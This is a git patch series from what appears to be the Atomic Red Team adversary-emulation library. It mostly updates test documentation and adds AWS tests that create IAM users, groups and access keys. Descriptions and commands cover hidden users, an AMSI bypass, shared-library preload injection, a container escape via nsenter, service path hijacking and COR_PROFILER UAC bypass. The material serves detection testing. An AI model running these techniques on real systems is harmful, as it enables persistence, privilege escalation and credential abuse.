## Atomic Test #4 - Create ADS PowerShell - -auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 - Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + + + #### Inputs: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 4bdd4e75..08e4f131 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,9 +16,6 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA - -auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a - This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -30,9 +27,14 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + + + @@ -76,13 +78,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" - -auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - Creating a user with a username containing "$" + **Supported Platforms:** Windows +**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778 + + + @@ -106,13 +110,15 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) - -auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c - Creating a user with a username containing with a space on the end + **Supported Platforms:** Windows +**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c + + + diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 7a3de378..da4434af 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,15 +14,17 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript - -auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 - The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306 + + + @@ -53,14 +55,16 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line - -auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f - Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 + **Supported Platforms:** Windows +**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f + + + #### Inputs: diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 1c14ffe9..a4b90c7a 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,13 +14,15 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl - -auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 - Utilize launchctl + **Supported Platforms:** macOS +**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2 + + + #### Inputs: diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index 6015e492..7ecc1ec7 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,15 +16,17 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service - -auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 - Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` + **Supported Platforms:** Windows +**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + + + #### Inputs: @@ -56,16 +58,18 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host - -auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c - Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). + **Supported Platforms:** Windows +**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c + + + #### Inputs: diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index a9aae7f5..3549804a 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,14 +12,16 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell - -auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 - Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4 + + + #### Inputs: @@ -45,13 +47,15 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port - -auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 - Testing uncommonly used port utilizing telnet. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767 + + + #### Inputs: diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ef035415..ce3ca961 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,18 +10,20 @@
## Atomic Test #1 - OpenSSL C2 - -auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 - Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. + **Supported Platforms:** Windows +**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003 + + + #### Inputs: diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index dcc50b0e..10700bb9 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,16 +16,18 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll - -auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + + + diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 10229d09..74667b1d 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,14 +12,16 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary - -auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040 + + + #### Inputs: diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index ec61d98f..45fef5aa 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,15 +18,17 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload - -auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + **Supported Platforms:** Linux +**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + + + #### Inputs: @@ -68,15 +70,17 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
## Atomic Test #2 - Shared Library Injection via LD_PRELOAD - -auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae - This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. + **Supported Platforms:** Linux +**auto_generated_guid:** bc219ff7-789f-4d51-9142-ecae3397deae + + + #### Inputs: diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index ffc87c80..b32b1035 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,15 +14,17 @@ This technique can be used for persistence if executables are called on a regula
## Atomic Test #1 - Execution of program.exe as service with unquoted service path - -auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f - When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. + **Supported Platforms:** Windows +**auto_generated_guid:** 2770dea7-c50f-457b-84c4-c40a47460d9f + + + #### Inputs: diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index 18600716..821ed917 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,14 +16,16 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness - -auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a - Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + **Supported Platforms:** Windows +**auto_generated_guid:** f7536d63-7fd4-466f-89da-7e48d550752a + + + #### Inputs: @@ -49,13 +51,15 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe - -auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 - Change Service registry ImagePath of a bengin service to a malicious file + **Supported Platforms:** Windows +**auto_generated_guid:** f38e9eea-e1d7-4ba6-b716-584791963827 + + + #### Inputs: diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index 958aac95..693d673f 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,9 +18,6 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
## Atomic Test #1 - User scope COR_PROFILER - -auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a - Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER). The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. @@ -28,9 +25,14 @@ If the account used is not a local administrator the profiler DLL will still exe the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a + + + #### Inputs: @@ -82,18 +84,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - System Scope COR_PROFILER - -auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310 - Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect. The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** f373b482-48c8-4ce4-85ed-d40c8b3f7310 + + + #### Inputs: @@ -141,15 +145,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - Registry-free process scope COR_PROFILER - -auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817 - Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell. Reference: https://redcanary.com/blog/cor_profiler-for-persistence/ + **Supported Platforms:** Windows +**auto_generated_guid:** 79d57242-bbef-41db-b301-9d01d9f6e817 + + + #### Inputs: diff --git a/atomics/T1609/T1609.md b/atomics/T1609/T1609.md index 292c6f39..e3aaf7bd 100644 --- a/atomics/T1609/T1609.md +++ b/atomics/T1609/T1609.md @@ -12,13 +12,15 @@ In Docker, adversaries may specify an entrypoint during container deployment tha
## Atomic Test #1 - ExecIntoContainer - -auto_generated_guid: d03bfcd3-ed87-49c8-8880-44bb772dea4b - Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“kubectl exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “kubectl exec”. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** d03bfcd3-ed87-49c8-8880-44bb772dea4b + + + #### Inputs: diff --git a/atomics/T1610/T1610.md b/atomics/T1610/T1610.md index c1e1dbd6..6b91bb16 100644 --- a/atomics/T1610/T1610.md +++ b/atomics/T1610/T1610.md @@ -12,17 +12,19 @@ Containers can be deployed by various means, such as via Docker's create ## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 58004e22-022c-4c51-b4a8-2b85ac5c596b - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 58004e22-022c-4c51-b4a8-2b85ac5c596b + + + diff --git a/atomics/T1611/T1611.md b/atomics/T1611/T1611.md index b39e3b53..910e11e7 100644 --- a/atomics/T1611/T1611.md +++ b/atomics/T1611/T1611.md @@ -12,17 +12,19 @@ There are multiple ways an adversary may escape to a host environment. Examples
## Atomic Test #1 - Deploy container using nsenter container escape - -auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff - In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container. Additional Details: - https://twitter.com/mauilion/status/1129468485480751104 - https://securekubernetes.com/scenario_2_attack/ + **Supported Platforms:** Linux +**auto_generated_guid:** 0b2f9520-a17a-4671-9dba-3bd034099fff + + + From fd47161006eee73b96372ad488b2a58bd06c923e Mon Sep 17 00:00:00 2001 From: Bhavin Patel Date: Thu, 24 Jun 2021 15:44:35 -0500 Subject: [PATCH 69/84] AWS Cloud atomics (#1457) * cloud atomics * adding new platform names * text and variable updates * minor * Update T1136.003.yaml Co-authored-by: bpatel Co-authored-by: Jose Enrique Hernandez Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- .gitignore | 3 +++ atomics/T1098.001/T1098.001.yaml | 31 +++++++++++++++++++++++++++++ atomics/T1098.001/bin/aws_secret.sh | 11 ++++++++++ atomics/T1098/T1098.yaml | 28 ++++++++++++++++++++++++++ atomics/T1136.003/T1136.003.yaml | 27 +++++++++++++++++++++++++ 5 files changed, 100 insertions(+) create mode 100644 atomics/T1098.001/T1098.001.yaml create mode 100755 atomics/T1098.001/bin/aws_secret.sh create mode 100644 atomics/T1136.003/T1136.003.yaml diff --git a/.gitignore b/.gitignore index f2f8d099..652699ed 100644 --- a/.gitignore +++ b/.gitignore @@ -24,3 +24,6 @@ docs/.sass-cache/ docs/_site/ **/Invoke-AtomicTest-ExecutionLog.csv techniques_hash.db + +# Credential files +*.creds \ No newline at end of file diff --git a/atomics/T1098.001/T1098.001.yaml b/atomics/T1098.001/T1098.001.yaml new file mode 100644 index 00000000..6435b055 --- /dev/null +++ b/atomics/T1098.001/T1098.001.yaml @@ -0,0 +1,31 @@ +attack_technique: T1098.001 +display_name: 'Account Manipulation: Additional Cloud Credentials' +atomic_tests: +- name: AWS - Create Access Key and Secret Key + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-491160a31122 + description: | + Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Create new AWS access and secret keys for the user + type: String + default: "atomicredteam" + dependencies: + - description: | + Check if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic + executor: + command: | + aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + cd $PathToAtomicsFolder/T1098.001/bin/ + ./aws_secret.sh + cleanup_command: | + access_key=`cat $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` + aws iam delete-access-key --access-key-id $access_key --user-name #{username} + rm $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds + name: sh \ No newline at end of file diff --git a/atomics/T1098.001/bin/aws_secret.sh b/atomics/T1098.001/bin/aws_secret.sh new file mode 100755 index 00000000..f96e740b --- /dev/null +++ b/atomics/T1098.001/bin/aws_secret.sh @@ -0,0 +1,11 @@ +#! /bin/sh +echo "Creating Profile in ./aws/credentials" +access_key=`cat aws_secret.creds| jq -r '.AccessKey.AccessKeyId'` +secret_key=`cat aws_secret.creds| jq -r '.AccessKey.SecretAccessKey'` +line=`grep -n atomicredteam ~/.aws/credentials | cut -d : -f1 |bc` +access="$(($line+1))" +secret="$(($line+2))" +sed -i '' "${access}s|aws_access_key_id = .*$|aws_access_key_id = $access_key|g" ~/.aws/credentials +sed -i '' "${secret}s|aws_secret_access_key = .*$|aws_secret_access_key = $secret_key|g" ~/.aws/credentials + + diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index e1093c43..8d72ceb3 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -101,3 +101,31 @@ atomic_tests: Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False name: powershell +- name: AWS - Create a group and add a user to that group + auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 + description: | + Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Name of the AWS group to create + type: String + default: "atomicredteam" + dependencies: + - description: | + Check if the user exists, we can only add a user to a group if the user exists. + prereq_command: | + aws iam list-users | grep #{username} + get_prereq_command: | + echo Please run atomic test T1136.003, before running this atomic test + executor: + command: | + aws iam create-group --group-name #{username} + aws iam add-user-to-group --user-name #{username} --group-name #{username} + cleanup_command: | + aws iam remove-user-from-group --user-name #{username} --group-name #{username} + aws iam delete-group --group-name #{username} + name: sh + + diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml new file mode 100644 index 00000000..4b3394b3 --- /dev/null +++ b/atomics/T1136.003/T1136.003.yaml @@ -0,0 +1,27 @@ +attack_technique: T1136.003 +display_name: 'Create Account: Cloud Account' +atomic_tests: +- name: AWS - Create a new IAM user + description: | + Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time + supported_platforms: + - iaas:aws + input_arguments: + username: + description: Username of the IAM user to create in AWS + type: String + default: "atomicredteam" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws iam create-user --user-name #{username} + cleanup_command: | + aws iam delete-user --user-name #{username} + name: sh + elevation_required: false From c77595d359bfde2a6bd7a15d78f065ba3b2676e4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 24 Jun 2021 20:45:04 +0000 Subject: [PATCH 70/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1136.003/T1136.003.yaml | 1 + atomics/used_guids.txt | 3 +++ 2 files changed, 4 insertions(+) diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml index 4b3394b3..4083c296 100644 --- a/atomics/T1136.003/T1136.003.yaml +++ b/atomics/T1136.003/T1136.003.yaml @@ -2,6 +2,7 @@ attack_technique: T1136.003 display_name: 'Create Account: Cloud Account' atomic_tests: - name: AWS - Create a new IAM user + auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad description: | Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index d6e53f28..0c7557d9 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -722,3 +722,6 @@ d546a3d9-0be5-40c7-ad82-5a7d79e1b66b afedc8c4-038c-4d82-b3e5-623a95f8a612 c99a829f-0bb8-4187-b2c6-d47d1df74cab b4988cad-6ed2-434d-ace5-ea2670782129 +8822c3b0-d9f9-4daf-a043-491160a31122 +8822c3b0-d9f9-4daf-a043-49f110a31122 +8d1c2368-b503-40c9-9057-8e42f21c58ad From ca1e5786ed14df5fe7de858cad321d5e918e2cc5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 20:45:11 +0000 Subject: [PATCH 71/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-linux.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 3 + atomics/Indexes/Indexes-CSV/linux-index.csv | 3 + atomics/Indexes/Indexes-Markdown/index.md | 7 +- .../Indexes/Indexes-Markdown/linux-index.md | 9 +- atomics/Indexes/Matrices/linux-matrix.md | 6 +- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/index.yaml | 108 +++++++++++++++++- atomics/T1098.001/T1098.001.md | 66 +++++++++++ atomics/T1098/T1098.md | 53 +++++++++ atomics/T1136.003/T1136.003.md | 60 ++++++++++ 12 files changed, 309 insertions(+), 14 deletions(-) create mode 100644 atomics/T1098.001/T1098.001.md create mode 100644 atomics/T1136.003/T1136.003.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json index 5358846e..cc0218bb 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/